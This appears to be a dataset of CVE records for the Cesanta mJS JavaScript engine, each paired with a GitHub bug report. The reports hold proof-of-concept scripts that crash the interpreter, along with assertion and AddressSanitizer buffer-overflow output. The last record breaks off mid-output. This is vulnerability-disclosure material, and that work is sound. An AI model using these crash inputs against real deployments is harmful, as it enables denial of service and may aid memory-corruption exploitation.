CVE-2021-46511 | 2022-01-27T21:15:09.550 | There is an Assertion `m->len >= sizeof(v)' failed at src/mjs_core.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/183"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/183"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/183 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function() {
((function JSEtest(a) {
if (a > 3) {
if ([Object.create.apply({}, [Object])]) {
JSEtest(Object.create.apply({}, [Object]))
}
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_core.c:372: mjs_pop_val: Assertion `m->len >= sizeof(v)' failed.
[1] 33895 abort mjs poc.js
```
Credits: Found by OWL337 team. | Assertion `m->len >= sizeof(v)' failed at src/mjs_core.c:372: mjs_pop_val | https://api.github.com/repos/cesanta/mjs/issues/183/comments | 0 | 2021-12-31T05:18:57Z | 2022-01-12T02:17:55Z | https://github.com/cesanta/mjs/issues/183 | 1,091,423,222 | 183 | 3,137 |
CVE-2021-46513 | 2022-01-27T21:15:09.633 | Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via mjs_mk_string at mjs/src/mjs_string.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/189"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/189"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/cesanta/mjs/issues/189 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))((JSON.stringify + 6.54321e2)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064330b at pc 0x0000005b16f4 bp 0x7ffcd99733d0 sp 0x7ffcd99733c8
READ of size 8 at 0x00000064330b thread T0
#0 0x5b16f3 in mjs_mk_string /root/mjs/src/mjs_string.c:58:15
#1 0x580796 in mjs_op_json_stringify /root/mjs/src/mjs_json.c:495:13
#2 0x55178f in mjs_exec_internal /root/mjs/src/mjs_exec.c:1073:5
#3 0x552d2d in mjs_exec_file /root/mjs/src/mjs_exec.c:1096:11
#4 0x5821d3 in main /root/mjs/src/mjs_main.c:47:11
#5 0x7f43da272b96 in __libc_start_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
#6 0x41a2c9 in _start (/usr/local/bin/mjs+0x41a2c9)
0x00000064330b is located 53 bytes to the left of global variable '<string literal>' defined in 'src/mjs_builtin.c:140:21' (0x643340) of size 4
'<string literal>' is ascii string 'ffi'
0x00000064330b is located 5 bytes to the right of global variable '<string literal>' defined in 'src/mjs_builtin.c:138:21' (0x643300) of size 6
'<string literal>' is ascii string 'print'
SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/mjs_string.c:58:15 in mjs_mk_string
Shadow bytes around the buggy address:
0x0000800c0610: f9 f9 f9 f9 00 00 00 00 00 00 00 05 f9 f9 f9 f9
0x0000800c0620: 00 06 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0000800c0630: 00 02 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0000800c0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0000800c0650: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
=>0x0000800c0660: 06[f9]f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800c0670: 00 04 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
0x0000800c0680: 07 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800c0690: 03 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
0x0000800c06a0: 04 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x0000800c06b0: 06 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==ABORTING
```
| Global-buffer-overflow mjs/src/mjs_string.c:58:15 in mjs_mk_string | https://api.github.com/repos/cesanta/mjs/issues/189/comments | 0 | 2021-12-31T05:24:24Z | 2021-12-31T05:49:18Z | https://github.com/cesanta/mjs/issues/189 | 1,091,424,556 | 189 | 3,138 |
CVE-2021-46514 | 2022-01-27T21:15:09.677 | There is an Assertion 'ppos != NULL && mjs_is_number(*ppos)' failed at src/mjs_core.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/187"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/187"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/187 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_CLANG=clang
$(DOCKER_CLANG) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function() {
((function JSEtest(a) {
if (a > 0) {
if (gc(gc --gc -- !== gc(' ' !== JSEtest(a - 1)))) {
JSEtest(a - 1)
}
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_core.c:311: int mjs_getretvalpos(struct mjs *): Assertion `ppos != NULL && mjs_is_number(*ppos)' failed.
[1] 32098 abort mjs poc.js
```
| Assertion `ppos != NULL && mjs_is_number(*ppos)' failed at src/mjs_core.c:311: int mjs_getretvalpos(struct mjs *). | https://api.github.com/repos/cesanta/mjs/issues/187/comments | 0 | 2021-12-31T05:22:41Z | 2021-12-31T08:13:20Z | https://github.com/cesanta/mjs/issues/187 | 1,091,424,159 | 187 | 3,139 |
CVE-2021-46515 | 2022-01-27T21:15:09.723 | There is an Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed at src/mjs_exec.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/186"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/186"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/186 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))(((JSON.stringify - (6) * 10000) - 20 * 9060)([([JSON.parse(JSON.stringify([(0)]))])]));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_exec.c:949: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed.
[1] 118000 abort mjs poc.js
```
Credits: Found by OWL337 team. | Assertion `mjs_stack_size(&mjs->scopes) >= scopes_len' failed at src/mjs_exec.c:949: mjs_execute. | https://api.github.com/repos/cesanta/mjs/issues/186/comments | 0 | 2021-12-31T05:21:24Z | 2022-01-12T02:18:21Z | https://github.com/cesanta/mjs/issues/186 | 1,091,423,861 | 186 | 3,140 |
CVE-2021-46517 | 2022-01-27T21:15:09.813 | There is an Assertion `mjs_stack_size(&mjs->scopes) > 0' failed at src/mjs_exec.c in Cesanta MJS v2.20.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/184"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/184"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/cesanta/mjs/issues/184 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function() {
((function JSEtest(a) {
if (a > 3) {
if ([((function JSEtest(a) {
if (a > 3) {
if ([Object.create.apply({}, [Object])]) {
Object.create.apply({}, [Object])
}
}
})(6))([((function JSEtest(a) {
if (a > 3) {
if ([Object.create.apply({}, [Object])]) {
Object.create.apply({}, [Object])
}
}
})(6))({}, [Object])])]) {
Object.create.apply({}, [Object])
}
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
mjs: src/mjs_exec.c:725: mjs_execute: Assertion `mjs_stack_size(&mjs->scopes) > 0' failed.
[1] 111718 abort mjs poc.js
```
| Assertion `mjs_stack_size(&mjs->scopes) > 0' failed src/mjs_exec.c:725: mjs_execute. | https://api.github.com/repos/cesanta/mjs/issues/184/comments | 0 | 2021-12-31T05:19:48Z | 2021-12-31T05:46:31Z | https://github.com/cesanta/mjs/issues/184 | 1,091,423,443 | 184 | 3,141 |
CVE-2021-46518 | 2022-01-27T21:15:09.857 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_disown at src/mjs_core.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/195"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/195 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
DOCKER_CLANG=clang
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(JSON.stringify([1, 2, 3]))(((JSON.stringify - 6.24321e2) - 6.54321e2)(JSON.stringify([1, 2, 3])));
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000138 at pc 0x563a2f179088 bp 0x7fff18d361c0 sp 0x7fff18d361b0
READ of size 8 at 0x604000000138 thread T0
#0 0x563a2f179087 in mjs_disown src/mjs_core.c:288
#1 0x563a2f1c7b54 in mjs_json_parse src/mjs_json.c:480
#2 0x7fff18d3630f (<unknown module>)
Address 0x604000000138 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs_core.c:288 in mjs_disown
Shadow bytes around the buggy address:
0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
=>0x0c087fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/mjs_core.c:288 in mjs_disown | https://api.github.com/repos/cesanta/mjs/issues/195/comments | 0 | 2021-12-31T05:37:12Z | 2022-01-12T02:18:56Z | https://github.com/cesanta/mjs/issues/195 | 1,091,427,107 | 195 | 3,142 |
CVE-2021-46519 | 2022-01-27T21:15:09.900 | Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_array_length at src/mjs_array.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/194"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mjs/issues/194"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mjs:2.20.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CF8D39F6-ACB1-46F8-87CF-1B41EFC157BE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mjs/issues/194 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mjs"
] | ###### mJS revision
Commit: [b1b6eac](https://github.com/cesanta/mjs/commit/b1b6eac6b1e5b830a5cb14f8f4dc690ef3162551)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
vim Makefile
DOCKER_GCC=gcc
$(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
# save the makefile then make
make
```
###### Test case
<details>
<summary>poc.js</summary>
<pre><code>
```javascript
(function () {
((function JSEtes(a) {
if ((a - 1)) {
if ((isNaN)(JSON.stringify([])) !== JSON.stringify("start_port" !== [Object.create.apply({}, [Object])])) {
JSEtes(a - 1)
}
}
})(6))
})()
```
</code></pre>
</details>
###### Execution steps & Output
```bash
$ ./mjs/build/mjs poc.js
=================================================================
